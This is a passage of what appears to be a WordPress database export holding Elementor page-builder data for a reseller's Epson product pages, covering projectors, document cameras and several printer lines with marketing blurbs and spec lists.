]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4009,2760,'_elementor_version','0.4'),(4012,2761,'_wp_page_template','template-fullwidth.php'),(4013,2761,'_elementor_edit_mode','builder'),(4014,2761,'_elementor_template_type','post'),(4015,2761,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-100\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints 